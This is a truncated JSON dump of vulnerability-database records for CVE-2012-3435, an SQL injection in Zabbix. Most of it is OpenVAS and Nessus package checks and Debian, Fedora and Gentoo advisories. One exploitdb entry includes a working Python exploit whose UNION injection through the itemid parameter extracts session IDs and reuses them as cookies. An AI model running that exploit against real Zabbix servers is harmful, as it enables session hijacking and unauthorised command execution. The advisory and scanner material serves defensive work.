"2012-09-04T00:00:00", "id": "OPENVAS:1361412562310864690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864690", "type": "openvas", "title": "Fedora Update for zabbix FEDORA-2012-12496", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2012-12496\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085844.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864690\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:34:52 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-3435\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-12496\");\n script_name(\"Fedora Update for zabbix FEDORA-2012-12496\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zabbix'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"zabbix on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~1.8.15~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "description": "The remote host is missing an update to zabbix\nannounced via advisory DSA 2539-1.", "modified": "2019-03-18T00:00:00", "published": "2012-09-15T00:00:00", "id": "OPENVAS:136141256231072168", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231072168", "type": "openvas", "title": "Debian Security Advisory DSA 2539-1 (zabbix)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2539_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2539-1 (zabbix)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.72168\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-3435\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-15 04:23:46 -0400 (Sat, 15 Sep 2012)\");\n script_name(\"Debian Security Advisory DSA 2539-1 (zabbix)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202539-1\");\n script_tag(name:\"insight\", value:\"It was discovered that Zabbix, a network monitoring solution, does not\nproperly validate user input used as a part of an SQL query. This may\nallow unauthenticated attackers to execute arbitrary SQL commands (SQL\ninjection) and possibly escalate privileges.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.8.2-1squeeze4.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.0.2+dfsg-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your zabbix packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to zabbix\nannounced via advisory DSA 2539-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"zabbix-agent\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-frontend-php\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-mysql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-pgsql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-server-mysql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-server-pgsql\", ver:\"1:1.8.2-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4615", "CVE-2012-3435"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:1361412562310864689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864689", "type": "openvas", "title": "Fedora Update for zabbix FEDORA-2012-12488", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2012-12488\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085818.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864689\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:34:47 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-3435\", \"CVE-2011-4615\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-12488\");\n script_name(\"Fedora Update for zabbix FEDORA-2012-12488\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zabbix'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"zabbix on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~1.8.15~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:58:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4615", "CVE-2012-3435"], "description": "Check for the Version of zabbix", "modified": "2017-12-26T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:864689", "href": "http://plugins.openvas.org/nasl.php?oid=864689", "type": "openvas", "title": "Fedora Update for zabbix FEDORA-2012-12488", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2012-12488\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ZABBIX is software that monitors numerous parameters of a network and\n the health and integrity of servers. ZABBIX uses a flexible\n notification mechanism that allows users to configure e-mail based\n alerts for virtually any event. This allows a fast reaction to server\n problems. ZABBIX offers excellent reporting and data visualisation\n features based on the stored data. This makes ZABBIX ideal for\n capacity planning.\n\n ZABBIX supports both polling and trapping. All ZABBIX reports and\n statistics, as well as configuration parameters are accessed through a\n web-based front end. A web-based front end ensures that the status of\n your network and the health of your servers can be assessed from any\n location. Properly configured, ZABBIX can play an important role in\n monitoring IT infrastructure. This is equally true for small\n organisations with a few servers and for large companies with a\n multitude of servers.\";\n\ntag_affected = \"zabbix on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085818.html\");\n script_id(864689);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:34:47 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-3435\", \"CVE-2011-4615\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-12488\");\n script_name(\"Fedora Update for zabbix FEDORA-2012-12488\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of zabbix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~1.8.15~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4674", "CVE-2013-1364", "CVE-2010-1277", "CVE-2013-5572", "CVE-2011-3263", "CVE-2012-3435", "CVE-2011-2904"], "description": "Gentoo Linux Local Security Checks GLSA 201311-15", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121074", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121074", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201311-15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201311-15.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121074\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:20 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201311-15\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Zabbix. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201311-15\");\n script_cve_id(\"CVE-2010-1277\", \"CVE-2011-2904\", \"CVE-2011-3263\", \"CVE-2011-4674\", \"CVE-2012-3435\", \"CVE-2013-1364\", \"CVE-2013-5572\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201311-15\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/zabbix\", unaffected: make_list(\"ge 2.0.9_rc1-r2\"), vulnerable: make_list(\"lt 2.0.9_rc1-r2\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3435"], "description": "SQL Injection vulnerability in Zabbix itemid parameter\n\nVulnerability Type: SQL Injection", "modified": "2013-04-02T00:00:00", "published": "2013-01-13T00:00:00", "id": "E-80", "href": "", "type": "dsquare", "title": "Zabbix 2.0 SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T13:26:54", "description": "Zabbix <= 2.0.1 - Session Extractor (0day). CVE-2012-3435. Webapps exploit for php platform", "published": "2012-07-24T00:00:00", "type": "exploitdb", "title": "Zabbix <= 2.0.1 - Session Extractor 0day", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3435"], "modified": "2012-07-24T00:00:00", "id": "EDB-ID:20087", "href": "https://www.exploit-db.com/exploits/20087/", "sourceData": "#!/usr/bin/python\r\n\r\nimport re\r\nimport sys,urllib2,urllib\r\n\r\nprint \"\\n[*] Zabbix 2.0.1 Session Extractor 0day\"\r\nprint \"[*] http://www.offensive-security.com\"\r\nprint \"##################################\\n\"\r\n\r\n''' \r\n\r\nThe sessions found by this tool may allow you to access the scripts.php file.\r\nThrough this web interface, an administrator can define new malicious scripts. \r\nThese scripts can then be called from the maps area, and executed with \"zabbix\" permissions.\r\n\r\nTimeline:\r\n\r\n17 Jul 2012: Vulnerabilty reported\r\n17 Jul 2012: Reply received\r\n18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348\r\n19 Jul 2012: Fixed for inclusion in version 2.0.2\r\n\r\n'''\r\n\r\nip=\"172.16.164.150\"\r\n\r\ntarget = 'http://%s/zabbix/popup_bitem.php' % ip\r\nurl = 'http://%s/zabbix/scripts.php' % ip\r\n\r\ndef sendSql(num):\r\n global target\r\n payload=\"1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#\" % num\r\n payload=\"1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#\" % num\r\n values = {'dstfrm':'1','itemid':payload }\r\n url = \"%s?%s\" % (target, urllib.urlencode(values)) \r\n req = urllib2.Request(url) \r\n response = urllib2.urlopen(req) \r\n data = response.read() \r\n return data\r\n\r\ndef normal(cookie):\r\n\tglobal url\r\n req = urllib2.Request(url)\r\n cook = \"zbx_sessionid=%s\" %cookie\r\n req.add_header('Cookie', cook)\r\n response = urllib2.urlopen(req) \r\n data = response.read() \r\n if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):\r\n return \"FAIL\"\r\n else:\r\n return \"SUCCESS\"\r\n\r\nsessions=[]\r\n\r\nfor m in range(1,2):\r\n\tprint \"[*] Searching sessions belonging to id %s\" % m\r\n hola=sendSql(m)\r\n for l in re.findall(r\"([a-fA-F\\d]{32})\", hola):\r\n\t\tif l not in sessions:\r\n\t\t\tsessions.append(l)\r\n\t print \"[*] Found sessionid %s - %s\" % (l,normal(l))\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20087/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-3435"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2539-1 security@debian.org\r\nhttp://www.debian.org/security/ Raphael Geissert\r\nSeptember 06, 2012 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : zabbix\r\nVulnerability : SQL injection\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2012-3435\r\nDebian Bug : 683273\r\n\r\nIt was discovered that Zabbix, a network monitoring solution, does not\r\nproperly validate user input used as a part of an SQL query. This may\r\nallow unauthenticated attackers to execute arbitrary SQL commands (SQL\r\ninjection) and possibly escalate privileges.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1:1.8.2-1squeeze4.\r\n\r\nFor the testing distribution (wheezy), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1:2.0.2+dfsg-1.\r\n\r\nWe recommend that you upgrade your zabbix packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niEYEARECAAYFAlBIX7AACgkQYy49rUbZzlrfKwCdGUAYYsmuSFcaKKjgaap5PmSg\r\nYj4AoJ6SogKTB06ZEoEwxkCAhGv7XIvO\r\n=lWI6\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-09-07T00:00:00", "published": "2012-09-07T00:00:00", "id": "SECURITYVULNS:DOC:28539", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28539", "title": "[SECURITY] [DSA 2539-1] zabbix security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:48", "bulletinFamily": "software", "cvelist": ["CVE-2012-3373", "CVE-2012-4404", "CVE-2012-4336", "CVE-2012-3435", "CVE-2012-2275", "CVE-2012-3233"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2012-09-07T00:00:00", "published": "2012-09-07T00:00:00", "id": "SECURITYVULNS:VULN:12579", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12579", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3435"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2539-1 security@debian.org\nhttp://www.debian.org/security/ Raphael Geissert\nSeptember 06, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : zabbix\nVulnerability : SQL injection\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-3435\nDebian Bug : 683273\n\nIt was discovered that Zabbix, a network monitoring solution, does not\nproperly validate user input used as a part of an SQL query. This may\nallow unauthenticated attackers to execute arbitrary SQL commands (SQL\ninjection) and possibly escalate privileges.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.8.2-1squeeze4.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.0.2+dfsg-1.\n\nWe recommend that you upgrade your zabbix packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2012-09-06T08:47:18", "published": "2012-09-06T08:47:18", "id": "DEBIAN:DSA-2539-1:52838", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00180.html", "title": "[SECURITY] [DSA 2539-1] zabbix security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3435"], "description": "ZABBIX is software that monitors numerous parameters of a network and the health and integrity of servers. ZABBIX uses a flexible notification mechanism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. ZABBIX offers excellent reporting and data visualisation features based on the stored data. This makes ZABBIX ideal for capacity planning. ZABBIX supports both polling and trapping. All ZABBIX reports and statistics, as well as configuration parameters are accessed through a web-based front end. A web-based front end ensures that the status of your network and the health of your servers can be assessed from any location. Properly configured, ZABBIX can play an important role in monitoring IT infrastructure. This is equally true for small organisations with a few servers and for large companies with a multitude of servers. ", "modified": "2012-08-31T01:03:03", "published": "2012-08-31T01:03:03", "id": "FEDORA:59F8C20AE3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: zabbix-1.8.15-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4615", "CVE-2012-3435"], "description": "ZABBIX is software that monitors numerous parameters of a network and the health and integrity of servers. ZABBIX uses a flexible notification mechanism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. ZABBIX offers excellent reporting and data visualisation features based on the stored data. This makes ZABBIX ideal for capacity planning. ZABBIX supports both polling and trapping. All ZABBIX reports and statistics, as well as configuration parameters are accessed through a web-based front end. A web-based front end ensures that the status of your network and the health of your servers can be assessed from any location. Properly configured, ZABBIX can play an important role in monitoring IT infrastructure. This is equally true for small organisations with a few servers and for large companies with a multitude of servers. ", "modified": "2012-08-31T00:58:11", "published": "2012-08-31T00:58:11", "id": "FEDORA:6EF6721013", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: zabbix-1.8.15-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:47:35", "description": "It was discovered that Zabbix, a network monitoring solution, does not\nproperly validate user input used as a part of a SQL query. This may\nallow unauthenticated attackers to execute arbitrary SQL commands (SQL\ninjection) and possibly escalate privileges.", "edition": 19, "published": "2012-09-07T00:00:00", "title": "Debian DSA-2539-1 : zabbix - SQL injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "modified": "2012-09-07T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:zabbix"], "id": "DEBIAN_DSA-2539.NASL", "href": "https://www.tenable.com/plugins/nessus/62000", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2539. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62000);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3435\");\n script_bugtraq_id(54661);\n script_xref(name:\"DSA\", value:\"2539\");\n\n script_name(english:\"Debian DSA-2539-1 : zabbix - SQL injection\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Zabbix, a network monitoring solution, does not\nproperly validate user input used as a part of a SQL query. This may\nallow unauthenticated attackers to execute arbitrary SQL commands (SQL\ninjection) and possibly escalate privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 